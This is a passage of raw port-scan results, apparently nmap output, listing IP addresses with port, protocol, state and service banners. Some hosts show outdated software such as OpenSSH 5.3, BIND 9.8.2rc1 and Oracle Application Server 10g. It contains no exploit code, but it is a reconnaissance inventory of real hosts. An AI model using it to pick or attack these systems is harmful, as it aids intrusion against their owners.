9406165.227.99.239 137 udp netbios-ns unknown
9407165.227.99.239 138 tcp netbios-dgm filtered
9408165.227.99.239 138 udp netbios-dgm unknown
9409165.227.99.239 139 tcp netbios-ssn filtered
9410165.227.99.239 139 udp netbios-ssn unknown
9411165.227.99.239 161 tcp snmp filtered
9412165.227.99.239 161 udp snmp open net-snmp; net-snmp SNMPv3 server
9413165.227.99.239 162 tcp snmptrap filtered
9414165.227.99.239 162 udp snmptrap closed
9415165.227.99.239 389 tcp ldap filtered
9416165.227.99.239 389 udp ldap unknown
9417165.227.99.239 443 tcp ssl/http open nginx
9418165.227.99.239 520 tcp efs filtered
9419165.227.99.239 520 udp route unknown
9420165.227.99.239 2049 tcp nfs filtered
9421165.227.99.239 2049 udp nfs unknown
9422169.239.218.20 25 tcp smtp closed
9423169.239.218.20 53 tcp domain filtered
9424169.239.218.20 53 udp domain unknown
9425169.239.218.20 67 tcp dhcps filtered
9426169.239.218.20 67 udp dhcps unknown
9427169.239.218.20 68 tcp dhcpc filtered
9428169.239.218.20 68 udp dhcpc unknown
9429169.239.218.20 69 tcp tftp filtered
9430169.239.218.20 69 udp tftp unknown
9431169.239.218.20 88 tcp kerberos-sec filtered
9432169.239.218.20 88 udp kerberos-sec unknown
9433169.239.218.20 113 tcp ident closed
9434169.239.218.20 123 tcp ntp filtered
9435169.239.218.20 123 udp ntp unknown
9436169.239.218.20 137 tcp netbios-ns filtered
9437169.239.218.20 137 udp netbios-ns filtered
9438169.239.218.20 138 tcp netbios-dgm filtered
9439169.239.218.20 138 udp netbios-dgm filtered
9440169.239.218.20 139 tcp netbios-ssn closed
9441169.239.218.20 139 udp netbios-ssn unknown
9442169.239.218.20 161 tcp snmp filtered
9443169.239.218.20 161 udp snmp unknown
9444169.239.218.20 162 tcp snmptrap filtered
9445169.239.218.20 162 udp snmptrap unknown
9446169.239.218.20 389 tcp ldap filtered
9447169.239.218.20 389 udp ldap unknown
9448169.239.218.20 445 tcp microsoft-ds closed
9449169.239.218.20 520 tcp efs filtered
9450169.239.218.20 520 udp route unknown
9451169.239.218.20 2049 tcp nfs filtered
9452169.239.218.20 2049 udp nfs unknown
9453169.239.218.20 8008 tcp tcpwrapped open
9454173.214.244.169 53 tcp domain filtered
9455173.214.244.169 53 udp domain unknown
9456173.214.244.169 67 tcp dhcps filtered
9457173.214.244.169 67 udp dhcps unknown
9458173.214.244.169 68 tcp dhcpc filtered
9459173.214.244.169 68 udp dhcpc unknown
9460173.214.244.169 69 tcp tftp filtered
9461173.214.244.169 69 udp tftp unknown
9462173.214.244.169 88 tcp kerberos-sec filtered
9463173.214.244.169 88 udp kerberos-sec unknown
9464173.214.244.169 123 tcp ntp filtered
9465173.214.244.169 123 udp ntp unknown
9466173.214.244.169 137 tcp netbios-ns filtered
9467173.214.244.169 137 udp netbios-ns unknown
9468173.214.244.169 138 tcp netbios-dgm filtered
9469173.214.244.169 138 udp netbios-dgm unknown
9470173.214.244.169 139 tcp netbios-ssn filtered
9471173.214.244.169 139 udp netbios-ssn unknown
9472173.214.244.169 161 tcp snmp filtered
9473173.214.244.169 161 udp snmp unknown
9474173.214.244.169 162 tcp snmptrap filtered
9475173.214.244.169 162 udp snmptrap unknown
9476173.214.244.169 389 tcp ldap filtered
9477173.214.244.169 389 udp ldap unknown
9478173.214.244.169 520 tcp efs filtered
9479173.214.244.169 520 udp route unknown
9480173.214.244.169 2049 tcp nfs filtered
9481173.214.244.169 2049 udp nfs unknown
9482174.142.53.51 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 13:59. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
9483174.142.53.51 22 tcp ssh open SSH-2.0-OpenSSH_7.4
9484174.142.53.51 25 tcp smtp closed
9485174.142.53.51 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9486174.142.53.51 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9487174.142.53.51 67 tcp dhcps filtered
9488174.142.53.51 67 udp dhcps unknown
9489174.142.53.51 68 tcp dhcpc filtered
9490174.142.53.51 68 udp dhcpc unknown
9491174.142.53.51 69 tcp tftp filtered
9492174.142.53.51 69 udp tftp unknown
9493174.142.53.51 88 tcp kerberos-sec filtered
9494174.142.53.51 88 udp kerberos-sec unknown
9495174.142.53.51 123 tcp ntp filtered
9496174.142.53.51 123 udp ntp unknown
9497174.142.53.51 137 tcp netbios-ns filtered
9498174.142.53.51 137 udp netbios-ns filtered
9499174.142.53.51 138 tcp netbios-dgm filtered
9500174.142.53.51 138 udp netbios-dgm filtered
9501174.142.53.51 139 tcp netbios-ssn closed
9502174.142.53.51 139 udp netbios-ssn unknown
9503174.142.53.51 161 tcp snmp filtered
9504174.142.53.51 161 udp snmp unknown
9505174.142.53.51 162 tcp snmptrap filtered
9506174.142.53.51 162 udp snmptrap unknown
9507174.142.53.51 389 tcp ldap filtered
9508174.142.53.51 389 udp ldap unknown
9509174.142.53.51 445 tcp microsoft-ds closed
9510174.142.53.51 520 tcp efs filtered
9511174.142.53.51 520 udp route unknown
9512174.142.53.51 2049 tcp nfs filtered
9513174.142.53.51 2049 udp nfs unknown
9514186.64.118.40 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 100 allowed.\x0d\x0a220-Local time is now 13:39. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 10 minutes of inactivity.\x0d\x0a
9515186.64.118.40 53 tcp domain filtered
9516186.64.118.40 53 udp domain closed
9517186.64.118.40 67 tcp dhcps filtered
9518186.64.118.40 67 udp dhcps unknown
9519186.64.118.40 68 tcp dhcpc filtered
9520186.64.118.40 68 udp dhcpc unknown
9521186.64.118.40 69 tcp tftp filtered
9522186.64.118.40 69 udp tftp unknown
9523186.64.118.40 88 tcp kerberos-sec filtered
9524186.64.118.40 88 udp kerberos-sec unknown
9525186.64.118.40 123 tcp ntp filtered
9526186.64.118.40 123 udp ntp unknown
9527186.64.118.40 137 tcp netbios-ns filtered
9528186.64.118.40 137 udp netbios-ns unknown
9529186.64.118.40 138 tcp netbios-dgm filtered
9530186.64.118.40 138 udp netbios-dgm unknown
9531186.64.118.40 139 tcp netbios-ssn filtered
9532186.64.118.40 139 udp netbios-ssn unknown
9533186.64.118.40 161 tcp snmp filtered
9534186.64.118.40 161 udp snmp unknown
9535186.64.118.40 162 tcp snmptrap filtered
9536186.64.118.40 162 udp snmptrap unknown
9537186.64.118.40 389 tcp ldap filtered
9538186.64.118.40 389 udp ldap unknown
9539186.64.118.40 520 tcp efs filtered
9540186.64.118.40 520 udp route unknown
9541186.64.118.40 2049 tcp nfs closed
9542186.64.118.40 2049 udp nfs unknown
9543190.98.209.37 53 tcp domain filtered
9544190.98.209.37 53 udp domain unknown
9545190.98.209.37 67 tcp dhcps filtered
9546190.98.209.37 67 udp dhcps unknown
9547190.98.209.37 68 tcp dhcpc filtered
9548190.98.209.37 68 udp dhcpc unknown
9549190.98.209.37 69 tcp tftp filtered
9550190.98.209.37 69 udp tftp unknown
9551190.98.209.37 88 tcp kerberos-sec filtered
9552190.98.209.37 88 udp kerberos-sec unknown
9553190.98.209.37 123 tcp ntp filtered
9554190.98.209.37 123 udp ntp unknown
9555190.98.209.37 137 tcp netbios-ns filtered
9556190.98.209.37 137 udp netbios-ns unknown
9557190.98.209.37 138 tcp netbios-dgm filtered
9558190.98.209.37 138 udp netbios-dgm unknown
9559190.98.209.37 139 tcp netbios-ssn filtered
9560190.98.209.37 139 udp netbios-ssn unknown
9561190.98.209.37 161 tcp snmp filtered
9562190.98.209.37 161 udp snmp unknown
9563190.98.209.37 162 tcp snmptrap filtered
9564190.98.209.37 162 udp snmptrap unknown
9565190.98.209.37 389 tcp ldap filtered
9566190.98.209.37 389 udp ldap unknown
9567190.98.209.37 520 tcp efs filtered
9568190.98.209.37 520 udp route unknown
9569190.98.209.37 2049 tcp nfs filtered
9570190.98.209.37 2049 udp nfs unknown
9571190.107.177.35 53 tcp domain filtered ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9572190.107.177.35 53 udp domain unknown ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9573190.107.177.35 67 tcp dhcps filtered
9574190.107.177.35 67 udp dhcps unknown
9575190.107.177.35 68 tcp dhcpc filtered
9576190.107.177.35 68 udp dhcpc unknown
9577190.107.177.35 69 tcp tftp filtered
9578190.107.177.35 69 udp tftp unknown
9579190.107.177.35 88 tcp kerberos-sec filtered
9580190.107.177.35 88 udp kerberos-sec unknown
9581190.107.177.35 123 tcp ntp filtered
9582190.107.177.35 123 udp ntp unknown
9583190.107.177.35 137 tcp netbios-ns filtered
9584190.107.177.35 137 udp netbios-ns unknown
9585190.107.177.35 138 tcp netbios-dgm filtered
9586190.107.177.35 138 udp netbios-dgm unknown
9587190.107.177.35 139 tcp netbios-ssn filtered
9588190.107.177.35 139 udp netbios-ssn unknown
9589190.107.177.35 161 tcp snmp filtered
9590190.107.177.35 161 udp snmp unknown
9591190.107.177.35 162 tcp snmptrap filtered
9592190.107.177.35 162 udp snmptrap unknown
9593190.107.177.35 389 tcp ldap filtered
9594190.107.177.35 389 udp ldap unknown
9595190.107.177.35 520 tcp efs filtered
9596190.107.177.35 520 udp route unknown
9597190.107.177.35 2049 tcp nfs filtered
9598190.107.177.35 2049 udp nfs unknown
9599190.110.121.175 53 tcp domain filtered
9600190.110.121.175 53 udp domain unknown
9601190.110.121.175 67 tcp dhcps filtered
9602190.110.121.175 67 udp dhcps unknown
9603190.110.121.175 68 tcp dhcpc filtered
9604190.110.121.175 68 udp dhcpc unknown
9605190.110.121.175 69 tcp tftp filtered
9606190.110.121.175 69 udp tftp unknown
9607190.110.121.175 88 tcp kerberos-sec filtered
9608190.110.121.175 88 udp kerberos-sec unknown
9609190.110.121.175 123 tcp ntp filtered
9610190.110.121.175 123 udp ntp unknown
9611190.110.121.175 137 tcp netbios-ns filtered
9612190.110.121.175 137 udp netbios-ns unknown
9613190.110.121.175 138 tcp netbios-dgm filtered
9614190.110.121.175 138 udp netbios-dgm unknown
9615190.110.121.175 139 tcp netbios-ssn filtered
9616190.110.121.175 139 udp netbios-ssn unknown
9617190.110.121.175 161 tcp snmp filtered
9618190.110.121.175 161 udp snmp unknown
9619190.110.121.175 162 tcp snmptrap filtered
9620190.110.121.175 162 udp snmptrap unknown
9621190.110.121.175 389 tcp ldap filtered
9622190.110.121.175 389 udp ldap unknown
9623190.110.121.175 520 tcp efs filtered
9624190.110.121.175 520 udp route unknown
9625190.110.121.175 2049 tcp nfs filtered
9626190.110.121.175 2049 udp nfs unknown
9627190.153.209.187 53 tcp domain filtered
9628190.153.209.187 53 udp domain unknown
9629190.153.209.187 67 tcp dhcps filtered
9630190.153.209.187 67 udp dhcps unknown
9631190.153.209.187 68 tcp dhcpc filtered
9632190.153.209.187 68 udp dhcpc unknown
9633190.153.209.187 69 tcp tftp filtered
9634190.153.209.187 69 udp tftp unknown
9635190.153.209.187 88 tcp kerberos-sec filtered
9636190.153.209.187 88 udp kerberos-sec unknown
9637190.153.209.187 123 tcp ntp filtered
9638190.153.209.187 123 udp ntp unknown
9639190.153.209.187 137 tcp netbios-ns filtered
9640190.153.209.187 137 udp netbios-ns unknown
9641190.153.209.187 138 tcp netbios-dgm filtered
9642190.153.209.187 138 udp netbios-dgm unknown
9643190.153.209.187 139 tcp netbios-ssn filtered
9644190.153.209.187 139 udp netbios-ssn unknown
9645190.153.209.187 161 tcp snmp filtered
9646190.153.209.187 161 udp snmp unknown
9647190.153.209.187 162 tcp snmptrap filtered
9648190.153.209.187 162 udp snmptrap unknown
9649190.153.209.187 389 tcp ldap filtered
9650190.153.209.187 389 udp ldap unknown
9651190.153.209.187 520 tcp efs filtered
9652190.153.209.187 520 udp route unknown
9653190.153.209.187 2049 tcp nfs filtered
9654190.153.209.187 2049 udp nfs unknown
9655190.153.219.254 22 tcp ssh open SSH-2.0-OpenSSH_7.4
9656190.153.219.254 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9657190.153.219.254 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9658190.153.219.254 67 tcp dhcps filtered
9659190.153.219.254 67 udp dhcps unknown
9660190.153.219.254 68 tcp dhcpc filtered
9661190.153.219.254 68 udp dhcpc unknown
9662190.153.219.254 69 tcp tftp filtered
9663190.153.219.254 69 udp tftp unknown
9664190.153.219.254 88 tcp kerberos-sec filtered
9665190.153.219.254 88 udp kerberos-sec unknown
9666190.153.219.254 123 tcp ntp filtered
9667190.153.219.254 123 udp ntp unknown
9668190.153.219.254 137 tcp netbios-ns filtered
9669190.153.219.254 137 udp netbios-ns unknown
9670190.153.219.254 138 tcp netbios-dgm filtered
9671190.153.219.254 138 udp netbios-dgm unknown
9672190.153.219.254 139 tcp netbios-ssn filtered
9673190.153.219.254 139 udp netbios-ssn unknown
9674190.153.219.254 161 tcp snmp filtered
9675190.153.219.254 161 udp snmp unknown
9676190.153.219.254 162 tcp snmptrap filtered
9677190.153.219.254 162 udp snmptrap unknown
9678190.153.219.254 389 tcp ldap filtered
9679190.153.219.254 389 udp ldap unknown
9680190.153.219.254 520 tcp efs filtered
9681190.153.219.254 520 udp route unknown
9682190.153.219.254 2049 tcp nfs filtered
9683190.153.219.254 2049 udp nfs unknown
9684192.185.134.58 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 2 of 150 allowed.\x0d\x0a220-Local time is now 22:31. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
9685192.185.134.58 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9686192.185.134.58 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9687192.185.134.58 67 tcp dhcps closed
9688192.185.134.58 67 udp dhcps unknown
9689192.185.134.58 68 tcp dhcpc closed
9690192.185.134.58 68 udp dhcpc unknown
9691192.185.134.58 69 tcp tftp closed
9692192.185.134.58 69 udp tftp closed
9693192.185.134.58 88 tcp kerberos-sec closed
9694192.185.134.58 88 udp kerberos-sec closed
9695192.185.134.58 123 tcp ntp closed
9696192.185.134.58 123 udp ntp unknown
9697192.185.134.58 137 tcp netbios-ns closed
9698192.185.134.58 137 udp netbios-ns closed
9699192.185.134.58 138 tcp netbios-dgm closed
9700192.185.134.58 138 udp netbios-dgm closed
9701192.185.134.58 139 tcp netbios-ssn closed
9702192.185.134.58 139 udp netbios-ssn closed
9703192.185.134.58 161 tcp snmp closed
9704192.185.134.58 161 udp snmp unknown
9705192.185.134.58 162 tcp snmptrap closed
9706192.185.134.58 162 udp snmptrap closed
9707192.185.134.58 389 tcp ldap closed
9708192.185.134.58 389 udp ldap unknown
9709192.185.134.58 520 tcp efs closed
9710192.185.134.58 520 udp route unknown
9711192.185.134.58 2049 tcp nfs closed
9712192.185.134.58 2049 udp nfs unknown
9713199.38.245.243 21 tcp ftp open Pure-FTPd
9714199.38.245.243 22 tcp ssh open OpenSSH 5.3 protocol 2.0
9715199.38.245.243 25 tcp smtp open Exim smtpd 4.92
9716199.38.245.243 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9717199.38.245.243 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9718199.38.245.243 67 tcp dhcps closed
9719199.38.245.243 67 udp dhcps unknown
9720199.38.245.243 68 tcp dhcpc closed
9721199.38.245.243 68 udp dhcpc unknown
9722199.38.245.243 69 tcp tftp closed
9723199.38.245.243 69 udp tftp unknown
9724199.38.245.243 80 tcp ssl/http open Apache/2
9725199.38.245.243 88 tcp kerberos-sec closed
9726199.38.245.243 88 udp kerberos-sec unknown
9727199.38.245.243 110 tcp pop3 open Dovecot DirectAdmin pop3d
9728199.38.245.243 123 tcp ntp closed
9729199.38.245.243 123 udp ntp unknown
9730199.38.245.243 137 tcp netbios-ns closed
9731199.38.245.243 137 udp netbios-ns unknown
9732199.38.245.243 138 tcp netbios-dgm closed
9733199.38.245.243 138 udp netbios-dgm unknown
9734199.38.245.243 139 tcp netbios-ssn closed
9735199.38.245.243 139 udp netbios-ssn unknown
9736199.38.245.243 143 tcp imap open Dovecot imapd
9737199.38.245.243 161 tcp snmp closed
9738199.38.245.243 161 udp snmp unknown
9739199.38.245.243 162 tcp snmptrap closed
9740199.38.245.243 162 udp snmptrap unknown
9741199.38.245.243 389 tcp ldap closed
9742199.38.245.243 389 udp ldap unknown
9743199.38.245.243 443 tcp ssl/ssl open Apache httpd SSL-only mode
9744199.38.245.243 465 tcp ssl/smtp open Exim smtpd 4.92
9745199.38.245.243 520 tcp efs closed
9746199.38.245.243 520 udp route unknown
9747199.38.245.243 587 tcp smtp open Exim smtpd 4.92
9748199.38.245.243 993 tcp ssl/imap open
9749199.38.245.243 995 tcp ssl/pop3 open Dovecot DirectAdmin pop3d
9750199.38.245.243 2049 tcp nfs closed
9751199.38.245.243 2049 udp nfs unknown
9752199.38.245.243 2222 tcp http open DirectAdmin httpd 1.57.1 Registered to Your Domain Goes Here, LLP
9753199.38.245.243 3306 tcp mysql open MySQL unauthorized
9754200.2.249.28 21 tcp ftp open vsftpd 3.0.2
9755200.2.249.28 53 udp domain unknown
9756200.2.249.28 67 udp dhcps unknown
9757200.2.249.28 68 udp dhcpc unknown
9758200.2.249.28 69 udp tftp unknown
9759200.2.249.28 80 tcp http open Oracle Application Server 10g httpd 10.1.3.5.0
9760200.2.249.28 88 udp kerberos-sec unknown
9761200.2.249.28 123 udp ntp unknown
9762200.2.249.28 137 udp netbios-ns unknown
9763200.2.249.28 138 udp netbios-dgm unknown
9764200.2.249.28 139 tcp netbios-ssn open Samba smbd 4.8.3 workgroup: SAMBA
9765200.2.249.28 139 udp netbios-ssn unknown
9766200.2.249.28 161 udp snmp unknown
9767200.2.249.28 162 udp snmptrap unknown
9768200.2.249.28 389 udp ldap unknown
9769200.2.249.28 445 tcp netbios-ssn open Samba smbd 4.8.3 workgroup: SAMBA
9770200.2.249.28 520 udp route unknown
9771200.2.249.28 2049 udp nfs unknown
9772200.10.251.82 53 tcp domain filtered
9773200.10.251.82 53 udp domain unknown
9774200.10.251.82 67 tcp dhcps filtered
9775200.10.251.82 67 udp dhcps unknown
9776200.10.251.82 68 tcp dhcpc filtered
9777200.10.251.82 68 udp dhcpc unknown
9778200.10.251.82 69 tcp tftp filtered
9779200.10.251.82 69 udp tftp unknown
9780200.10.251.82 88 tcp kerberos-sec filtered
9781200.10.251.82 88 udp kerberos-sec unknown
9782200.10.251.82 123 tcp ntp filtered
9783200.10.251.82 123 udp ntp unknown
9784200.10.251.82 137 tcp netbios-ns filtered
9785200.10.251.82 137 udp netbios-ns unknown
9786200.10.251.82 138 tcp netbios-dgm filtered
9787200.10.251.82 138 udp netbios-dgm unknown
9788200.10.251.82 139 tcp netbios-ssn filtered
9789200.10.251.82 139 udp netbios-ssn unknown
9790200.10.251.82 161 tcp snmp filtered
9791200.10.251.82 161 udp snmp unknown
9792200.10.251.82 162 tcp snmptrap filtered
9793200.10.251.82 162 udp snmptrap unknown
9794200.10.251.82 389 tcp ldap filtered
9795200.10.251.82 389 udp ldap unknown
9796200.10.251.82 520 tcp efs filtered
9797200.10.251.82 520 udp route unknown
9798200.10.251.82 2049 tcp nfs filtered
9799200.10.251.82 2049 udp nfs unknown
9800200.12.19.101 21 tcp ftp open 220 Microsoft FTP Service\x0d\x0a
9801200.12.19.101 53 tcp domain filtered
9802200.12.19.101 53 udp domain unknown
9803200.12.19.101 67 tcp dhcps filtered
9804200.12.19.101 67 udp dhcps closed
9805200.12.19.101 68 tcp dhcpc closed
9806200.12.19.101 68 udp dhcpc closed
9807200.12.19.101 69 tcp tftp closed
9808200.12.19.101 69 udp tftp closed
9809200.12.19.101 88 tcp kerberos-sec closed
9810200.12.19.101 88 udp kerberos-sec closed
9811200.12.19.101 123 tcp ntp filtered
9812200.12.19.101 123 udp ntp unknown
9813200.12.19.101 137 tcp netbios-ns closed
9814200.12.19.101 137 udp netbios-ns unknown
9815200.12.19.101 138 tcp netbios-dgm closed
9816200.12.19.101 138 udp netbios-dgm closed
9817200.12.19.101 139 tcp netbios-ssn closed
9818200.12.19.101 139 udp netbios-ssn closed
9819200.12.19.101 161 tcp snmp closed
9820200.12.19.101 161 udp snmp unknown
9821200.12.19.101 162 tcp snmptrap closed
9822200.12.19.101 162 udp snmptrap closed
9823200.12.19.101 389 tcp ldap closed
9824200.12.19.101 389 udp ldap unknown
9825200.12.19.101 520 tcp efs filtered
9826200.12.19.101 520 udp route unknown
9827200.12.19.101 2049 tcp nfs closed
9828200.12.19.101 2049 udp nfs unknown
9829200.29.0.33 53 tcp domain filtered
9830200.29.0.33 53 udp domain unknown
9831200.29.0.33 67 tcp dhcps filtered
9832200.29.0.33 67 udp dhcps unknown
9833200.29.0.33 68 tcp dhcpc filtered
9834200.29.0.33 68 udp dhcpc unknown
9835200.29.0.33 69 tcp tftp filtered
9836200.29.0.33 69 udp tftp unknown
9837200.29.0.33 88 tcp kerberos-sec filtered
9838200.29.0.33 88 udp kerberos-sec unknown
9839200.29.0.33 123 tcp ntp filtered
9840200.29.0.33 123 udp ntp unknown
9841200.29.0.33 137 tcp netbios-ns filtered
9842200.29.0.33 137 udp netbios-ns unknown
9843200.29.0.33 138 tcp netbios-dgm filtered
9844200.29.0.33 138 udp netbios-dgm unknown
9845200.29.0.33 139 tcp netbios-ssn filtered
9846200.29.0.33 139 udp netbios-ssn unknown
9847200.29.0.33 161 tcp snmp filtered
9848200.29.0.33 161 udp snmp unknown
9849200.29.0.33 162 tcp snmptrap filtered
9850200.29.0.33 162 udp snmptrap unknown
9851200.29.0.33 389 tcp ldap filtered
9852200.29.0.33 389 udp ldap unknown
9853200.29.0.33 520 tcp efs filtered
9854200.29.0.33 520 udp route unknown
9855200.29.0.33 2049 tcp nfs filtered
9856200.29.0.33 2049 udp nfs unknown
9857200.54.92.108 21 tcp ftp open 220 (vsFTPd 3.0.3)\x0d\x0a
9858200.54.92.108 22 tcp ssh open SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
9859200.54.92.108 53 tcp domain closed
9860200.54.92.108 53 udp domain unknown
9861200.54.92.108 67 tcp dhcps closed
9862200.54.92.108 67 udp dhcps unknown
9863200.54.92.108 68 tcp dhcpc closed
9864200.54.92.108 68 udp dhcpc unknown
9865200.54.92.108 69 tcp tftp closed
9866200.54.92.108 69 udp tftp unknown
9867200.54.92.108 88 tcp kerberos-sec closed
9868200.54.92.108 88 udp kerberos-sec unknown
9869200.54.92.108 123 tcp ntp closed
9870200.54.92.108 123 udp ntp unknown
9871200.54.92.108 137 tcp netbios-ns closed
9872200.54.92.108 137 udp netbios-ns unknown
9873200.54.92.108 138 tcp netbios-dgm closed
9874200.54.92.108 138 udp netbios-dgm unknown
9875200.54.92.108 139 tcp netbios-ssn closed
9876200.54.92.108 139 udp netbios-ssn unknown
9877200.54.92.108 161 tcp snmp closed
9878200.54.92.108 161 udp snmp unknown
9879200.54.92.108 162 tcp snmptrap closed
9880200.54.92.108 162 udp snmptrap unknown
9881200.54.92.108 389 tcp ldap closed
9882200.54.92.108 389 udp ldap unknown
9883200.54.92.108 520 tcp efs closed
9884200.54.92.108 520 udp route unknown
9885200.54.92.108 2049 tcp nfs closed
9886200.54.92.108 2049 udp nfs unknown
9887200.54.230.247 21 tcp ftp open 220 ProFTPD Server (ProFTPD) [200.54.230.247]\x0d\x0a
9888200.54.230.247 22 tcp ssh open SSH-2.0-OpenSSH_7.4
9889200.54.230.247 53 tcp domain open unknown banner: none
9890200.54.230.247 53 udp domain open unknown banner: none
9891200.54.230.247 67 tcp dhcps filtered
9892200.54.230.247 67 udp dhcps unknown
9893200.54.230.247 68 tcp dhcpc filtered
9894200.54.230.247 68 udp dhcpc unknown
9895200.54.230.247 69 tcp tftp filtered
9896200.54.230.247 69 udp tftp unknown
9897200.54.230.247 88 tcp kerberos-sec filtered
9898200.54.230.247 88 udp kerberos-sec unknown
9899200.54.230.247 123 tcp ntp filtered
9900200.54.230.247 123 udp ntp unknown
9901200.54.230.247 137 tcp netbios-ns filtered
9902200.54.230.247 137 udp netbios-ns unknown
9903200.54.230.247 138 tcp netbios-dgm filtered
9904200.54.230.247 138 udp netbios-dgm unknown
9905200.54.230.247 139 tcp netbios-ssn filtered
9906200.54.230.247 139 udp netbios-ssn filtered
9907200.54.230.247 161 tcp snmp filtered
9908200.54.230.247 161 udp snmp unknown
9909200.54.230.247 162 tcp snmptrap filtered
9910200.54.230.247 162 udp snmptrap unknown
9911200.54.230.247 389 tcp ldap filtered
9912200.54.230.247 389 udp ldap filtered
9913200.54.230.247 520 tcp efs filtered
9914200.54.230.247 520 udp route filtered
9915200.54.230.247 2049 tcp nfs filtered
9916200.54.230.247 2049 udp nfs unknown
9917200.55.198.228 22 tcp ssh open SSH-2.0-OpenSSH_7.4p1 Debian-11.0nosystemd1
9918200.55.198.228 53 tcp domain open
9919200.55.198.228 53 udp domain open
9920200.55.198.228 67 tcp dhcps filtered
9921200.55.198.228 67 udp dhcps unknown
9922200.55.198.228 68 tcp dhcpc filtered
9923200.55.198.228 68 udp dhcpc unknown
9924200.55.198.228 69 tcp tftp filtered
9925200.55.198.228 69 udp tftp unknown
9926200.55.198.228 88 tcp kerberos-sec filtered
9927200.55.198.228 88 udp kerberos-sec unknown
9928200.55.198.228 123 tcp ntp filtered
9929200.55.198.228 123 udp ntp unknown
9930200.55.198.228 137 tcp netbios-ns filtered
9931200.55.198.228 137 udp netbios-ns unknown
9932200.55.198.228 138 tcp netbios-dgm filtered
9933200.55.198.228 138 udp netbios-dgm unknown
9934200.55.198.228 139 tcp netbios-ssn filtered
9935200.55.198.228 139 udp netbios-ssn unknown
9936200.55.198.228 161 tcp snmp filtered
9937200.55.198.228 161 udp snmp unknown
9938200.55.198.228 162 tcp snmptrap filtered
9939200.55.198.228 162 udp snmptrap unknown
9940200.55.198.228 389 tcp ldap filtered
9941200.55.198.228 389 udp ldap unknown
9942200.55.198.228 520 tcp efs filtered
9943200.55.198.228 520 udp route closed
9944200.55.198.228 2049 tcp nfs filtered
9945200.55.198.228 2049 udp nfs unknown
9946200.68.30.227 53 tcp domain closed
9947200.68.30.227 53 udp domain unknown
9948200.68.30.227 67 tcp dhcps closed
9949200.68.30.227 67 udp dhcps filtered
9950200.68.30.227 68 tcp dhcpc closed
9951200.68.30.227 68 udp dhcpc unknown
9952200.68.30.227 69 tcp tftp closed
9953200.68.30.227 69 udp tftp unknown
9954200.68.30.227 88 tcp kerberos-sec closed
9955200.68.30.227 88 udp kerberos-sec unknown
9956200.68.30.227 123 tcp ntp closed
9957200.68.30.227 123 udp ntp filtered
9958200.68.30.227 137 tcp netbios-ns closed
9959200.68.30.227 137 udp netbios-ns filtered
9960200.68.30.227 138 tcp netbios-dgm closed
9961200.68.30.227 138 udp netbios-dgm filtered
9962200.68.30.227 139 tcp netbios-ssn closed
9963200.68.30.227 139 udp netbios-ssn filtered
9964200.68.30.227 161 tcp snmp closed
9965200.68.30.227 161 udp snmp filtered
9966200.68.30.227 162 tcp snmptrap closed
9967200.68.30.227 162 udp snmptrap filtered
9968200.68.30.227 389 tcp ldap closed
9969200.68.30.227 389 udp ldap unknown
9970200.68.30.227 520 tcp efs closed
9971200.68.30.227 520 udp route filtered
9972200.68.30.227 2049 tcp nfs closed
9973200.68.30.227 2049 udp nfs filtered
9974200.68.34.99 53 tcp domain filtered
9975200.68.34.99 53 udp domain unknown
9976200.68.34.99 67 tcp dhcps filtered
9977200.68.34.99 67 udp dhcps unknown
9978200.68.34.99 68 tcp dhcpc filtered
9979200.68.34.99 68 udp dhcpc unknown
9980200.68.34.99 69 tcp tftp filtered
9981200.68.34.99 69 udp tftp unknown
9982200.68.34.99 88 tcp kerberos-sec filtered
9983200.68.34.99 88 udp kerberos-sec unknown
9984200.68.34.99 123 tcp ntp filtered
9985200.68.34.99 123 udp ntp unknown
9986200.68.34.99 137 tcp netbios-ns filtered
9987200.68.34.99 137 udp netbios-ns unknown
9988200.68.34.99 138 tcp netbios-dgm filtered
9989200.68.34.99 138 udp netbios-dgm unknown
9990200.68.34.99 139 tcp netbios-ssn filtered
9991200.68.34.99 139 udp netbios-ssn unknown
9992200.68.34.99 161 tcp snmp filtered
9993200.68.34.99 161 udp snmp unknown
9994200.68.34.99 162 tcp snmptrap filtered
9995200.68.34.99 162 udp snmptrap unknown
9996200.68.34.99 389 tcp ldap filtered
9997200.68.34.99 389 udp ldap unknown
9998200.68.34.99 520 tcp efs filtered
9999200.68.34.99 520 udp route unknown
10000200.68.34.99 2049 tcp nfs filtered
10001200.68.34.99 2049 udp nfs unknown
10002200.73.54.34 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10003200.73.54.34 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10004200.73.54.34 67 tcp dhcps filtered
10005200.73.54.34 67 udp dhcps unknown
10006200.73.54.34 68 tcp dhcpc filtered
10007200.73.54.34 68 udp dhcpc unknown
10008200.73.54.34 69 tcp tftp filtered
10009200.73.54.34 69 udp tftp unknown
10010200.73.54.34 88 tcp kerberos-sec filtered
10011200.73.54.34 88 udp kerberos-sec unknown
